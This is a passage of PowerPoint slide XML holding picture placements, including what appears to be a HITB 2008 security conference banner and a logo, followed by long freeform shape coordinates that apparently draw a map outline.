          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4910138" y="4468813"/>
            <a:ext cx="3895725" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34826" name="Picture 14" descr="ekologo.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3970338" y="3021013"/>
            <a:ext cx="1317625" cy="1231900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34827" name="Picture 16" descr="hitbsecconf2008kl-banner.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="333375" y="2103438"/>
            <a:ext cx="4152900" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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842" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="609600"/>
            <a:ext cx="9144000" cy="5907088"/>
            <a:chOff x="0" y="328"/>
            <a:chExt cx="5760" cy="3721"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35852" name="AutoShape 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="367"/>
              <a:ext cx="5760" cy="3682"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="35853" name="Group 205"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1541" y="929"/>
              <a:ext cx="4210" cy="3063"/>
              <a:chOff x="1541" y="929"/>
              <a:chExt cx="4210" cy="3063"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36273" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3054" y="929"/>
                <a:ext cx="2697" cy="1297"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2350 w 2697"/>
                  <a:gd name="T1" fmla="*/ 470 h 1297"/>
                  <a:gd name="T2" fmla="*/ 2091 w 2697"/>
                  <a:gd name="T3" fmla="*/ 397 h 1297"/>
                  <a:gd name="T4" fmla="*/ 1893 w 2697"/>
                  <a:gd name="T5" fmla="*/ 325 h 1297"/>
                  <a:gd name="T6" fmla="*/ 1729 w 2697"/>
                  <a:gd name="T7" fmla="*/ 366 h 1297"/>
                  <a:gd name="T8" fmla="*/ 1556 w 2697"/>
                  <a:gd name="T9" fmla="*/ 260 h 1297"/>
                  <a:gd name="T10" fmla="*/ 1464 w 2697"/>
                  <a:gd name="T11" fmla="*/ 188 h 1297"/>
                  <a:gd name="T12" fmla="*/ 1290 w 2697"/>
                  <a:gd name="T13" fmla="*/ 43 h 1297"/>
                  <a:gd name="T14" fmla="*/ 1077 w 2697"/>
                  <a:gd name="T15" fmla="*/ 240 h 1297"/>
                  <a:gd name="T16" fmla="*/ 1003 w 2697"/>
                  <a:gd name="T17" fmla="*/ 428 h 1297"/>
                  <a:gd name="T18" fmla="*/ 896 w 2697"/>
                  <a:gd name="T19" fmla="*/ 386 h 1297"/>
                  <a:gd name="T20" fmla="*/ 921 w 2697"/>
                  <a:gd name="T21" fmla="*/ 515 h 1297"/>
                  <a:gd name="T22" fmla="*/ 792 w 2697"/>
                  <a:gd name="T23" fmla="*/ 596 h 1297"/>
                  <a:gd name="T24" fmla="*/ 827 w 2697"/>
                  <a:gd name="T25" fmla="*/ 300 h 1297"/>
                  <a:gd name="T26" fmla="*/ 742 w 2697"/>
                  <a:gd name="T27" fmla="*/ 490 h 1297"/>
                  <a:gd name="T28" fmla="*/ 558 w 2697"/>
                  <a:gd name="T29" fmla="*/ 520 h 1297"/>
                  <a:gd name="T30" fmla="*/ 399 w 2697"/>
                  <a:gd name="T31" fmla="*/ 560 h 1297"/>
                  <a:gd name="T32" fmla="*/ 327 w 2697"/>
                  <a:gd name="T33" fmla="*/ 657 h 1297"/>
                  <a:gd name="T34" fmla="*/ 229 w 2697"/>
                  <a:gd name="T35" fmla="*/ 605 h 1297"/>
                  <a:gd name="T36" fmla="*/ 247 w 2697"/>
                  <a:gd name="T37" fmla="*/ 478 h 1297"/>
                  <a:gd name="T38" fmla="*/ 155 w 2697"/>
                  <a:gd name="T39" fmla="*/ 642 h 1297"/>
                  <a:gd name="T40" fmla="*/ 134 w 2697"/>
                  <a:gd name="T41" fmla="*/ 830 h 1297"/>
                  <a:gd name="T42" fmla="*/ 122 w 2697"/>
                  <a:gd name="T43" fmla="*/ 887 h 1297"/>
                  <a:gd name="T44" fmla="*/ 131 w 2697"/>
                  <a:gd name="T45" fmla="*/ 924 h 1297"/>
                  <a:gd name="T46" fmla="*/ 172 w 2697"/>
                  <a:gd name="T47" fmla="*/ 949 h 1297"/>
                  <a:gd name="T48" fmla="*/ 193 w 2697"/>
                  <a:gd name="T49" fmla="*/ 1000 h 1297"/>
                  <a:gd name="T50" fmla="*/ 192 w 2697"/>
                  <a:gd name="T51" fmla="*/ 1045 h 1297"/>
                  <a:gd name="T52" fmla="*/ 261 w 2697"/>
                  <a:gd name="T53" fmla="*/ 1091 h 1297"/>
                  <a:gd name="T54" fmla="*/ 321 w 2697"/>
                  <a:gd name="T55" fmla="*/ 1117 h 1297"/>
                  <a:gd name="T56" fmla="*/ 308 w 2697"/>
                  <a:gd name="T57" fmla="*/ 1167 h 1297"/>
                  <a:gd name="T58" fmla="*/ 342 w 2697"/>
                  <a:gd name="T59" fmla="*/ 1251 h 1297"/>
                  <a:gd name="T60" fmla="*/ 407 w 2697"/>
                  <a:gd name="T61" fmla="*/ 1269 h 1297"/>
                  <a:gd name="T62" fmla="*/ 443 w 2697"/>
                  <a:gd name="T63" fmla="*/ 1262 h 1297"/>
                  <a:gd name="T64" fmla="*/ 454 w 2697"/>
                  <a:gd name="T65" fmla="*/ 1195 h 1297"/>
                  <a:gd name="T66" fmla="*/ 443 w 2697"/>
                  <a:gd name="T67" fmla="*/ 1087 h 1297"/>
                  <a:gd name="T68" fmla="*/ 558 w 2697"/>
                  <a:gd name="T69" fmla="*/ 1073 h 1297"/>
                  <a:gd name="T70" fmla="*/ 652 w 2697"/>
                  <a:gd name="T71" fmla="*/ 1041 h 1297"/>
                  <a:gd name="T72" fmla="*/ 784 w 2697"/>
                  <a:gd name="T73" fmla="*/ 955 h 1297"/>
                  <a:gd name="T74" fmla="*/ 868 w 2697"/>
                  <a:gd name="T75" fmla="*/ 1008 h 1297"/>
                  <a:gd name="T76" fmla="*/ 1048 w 2697"/>
                  <a:gd name="T77" fmla="*/ 1108 h 1297"/>
                  <a:gd name="T78" fmla="*/ 1239 w 2697"/>
                  <a:gd name="T79" fmla="*/ 1098 h 1297"/>
                  <a:gd name="T80" fmla="*/ 1456 w 2697"/>
                  <a:gd name="T81" fmla="*/ 1113 h 1297"/>
                  <a:gd name="T82" fmla="*/ 1589 w 2697"/>
                  <a:gd name="T83" fmla="*/ 1029 h 1297"/>
                  <a:gd name="T84" fmla="*/ 1822 w 2697"/>
                  <a:gd name="T85" fmla="*/ 1148 h 1297"/>
                  <a:gd name="T86" fmla="*/ 1787 w 2697"/>
                  <a:gd name="T87" fmla="*/ 1261 h 1297"/>
                  <a:gd name="T88" fmla="*/ 1924 w 2697"/>
                  <a:gd name="T89" fmla="*/ 1032 h 1297"/>
                  <a:gd name="T90" fmla="*/ 1863 w 2697"/>
                  <a:gd name="T91" fmla="*/ 940 h 1297"/>
                  <a:gd name="T92" fmla="*/ 2061 w 2697"/>
                  <a:gd name="T93" fmla="*/ 832 h 1297"/>
                  <a:gd name="T94" fmla="*/ 2173 w 2697"/>
                  <a:gd name="T95" fmla="*/ 769 h 1297"/>
                  <a:gd name="T96" fmla="*/ 2281 w 2697"/>
                  <a:gd name="T97" fmla="*/ 776 h 1297"/>
                  <a:gd name="T98" fmla="*/ 2166 w 2697"/>
                  <a:gd name="T99" fmla="*/ 1049 h 1297"/>
                  <a:gd name="T100" fmla="*/ 2264 w 2697"/>
                  <a:gd name="T101" fmla="*/ 936 h 1297"/>
                  <a:gd name="T102" fmla="*/ 2305 w 2697"/>
                  <a:gd name="T103" fmla="*/ 818 h 1297"/>
                  <a:gd name="T104" fmla="*/ 2486 w 2697"/>
                  <a:gd name="T105" fmla="*/ 741 h 1297"/>
                  <a:gd name="T106" fmla="*/ 2480 w 2697"/>
                  <a:gd name="T107" fmla="*/ 659 h 1297"/>
                  <a:gd name="T108" fmla="*/ 2629 w 2697"/>
                  <a:gd name="T109" fmla="*/ 661 h 1297"/>
                  <a:gd name="T110" fmla="*/ 2642 w 2697"/>
                  <a:gd name="T111" fmla="*/ 565 h 1297"/>
                  <a:gd name="T112" fmla="*/ 44 w 2697"/>
                  <a:gd name="T113" fmla="*/ 967 h 1297"/>
                  <a:gd name="T114" fmla="*/ 1538 w 2697"/>
                  <a:gd name="T115" fmla="*/ 1099 h 1297"/>
                  <a:gd name="T116" fmla="*/ 1954 w 2697"/>
                  <a:gd name="T117" fmla="*/ 1170 h 1297"/>
                  <a:gd name="T118" fmla="*/ 637 w 2697"/>
                  <a:gd name="T119" fmla="*/ 194 h 1297"/>
                  <a:gd name="T120" fmla="*/ 595 w 2697"/>
                  <a:gd name="T121" fmla="*/ 156 h 1297"/>
                  <a:gd name="T122" fmla="*/ 516 w 2697"/>
                  <a:gd name="T123" fmla="*/ 367 h 1297"/>
                  <a:gd name="T124" fmla="*/ 520 w 2697"/>
                  <a:gd name="T125" fmla="*/ 304 h 1297"/>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2697"/>
                  <a:gd name="T190" fmla="*/ 0 h 1297"/>
                  <a:gd name="T191" fmla="*/ 2697 w 2697"/>
                  <a:gd name="T192" fmla="*/ 1297 h 1297"/>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2697" h="1297">
                    <a:moveTo>
                      <a:pt x="2538" y="488"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2538" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2538" y="488"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1110" y="1102"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1110" y="1102"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2538" y="488"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2530" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2525" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2520" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2510" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2505" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2495" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2486" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2481" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2471" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2455" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2440" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2430" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2429" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2420" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2412" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2403" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2390" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2386" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2384" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2389" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2395" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2397" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2396" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2384" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2373" y="497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2369" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2367" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2360" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2353" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2350" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2343" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2340" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2330" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2324" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2308" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2297" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2292" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2288" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2283" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2272" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2260" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2257" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2255" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2246" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2242" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2238" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2235" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2235" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2230" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2224" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2219" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2215" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2217" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2218" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2215" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2212" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2207" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2199" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2194" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2183" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2161" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2145" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2127" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2119" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2109" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2099" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2095" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2091" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2089" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2083" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2076" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2061" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2049" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2045" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2061" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2059" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2058" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2051" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2045" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2036" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2016" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2005" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1998" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1991" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1987" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1983" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1984" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1990" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1996" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1999" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1996" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1989" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1983" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1995" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1979" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1974" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1967" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1953" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1941" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1929" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1927" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1916" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1910" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1903" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1896" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1893" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1890" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1892" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1896" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1904" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1903" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1902" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1904" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1903" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1893" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1889" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1886" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1882" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1877" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1877" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1878" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1876" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1873" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1871" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1869" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1855" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1846" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1841" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1835" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1821" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1815" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1807" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1798" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1792" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1788" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1784" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1776" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1770" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1765" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1760" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1751" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1738" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1729" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1723" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1719" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1712" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1707" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1702" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1695" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1688" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1686" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1688" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1705" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1719" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1721" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1725" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1724" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1721" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1712" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1702" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1692" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1680" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1674" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1665" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1660" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1656" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1643" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1643" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1644" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1645" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1635" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1625" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1598" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1591" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1586" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1580" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1565" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1563" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1565" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1556" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1550" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1536" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1520" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1509" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1497" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1482" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1478" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1470" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1450" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1445" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1439" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1435" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1437" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1438" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1424" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1411" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
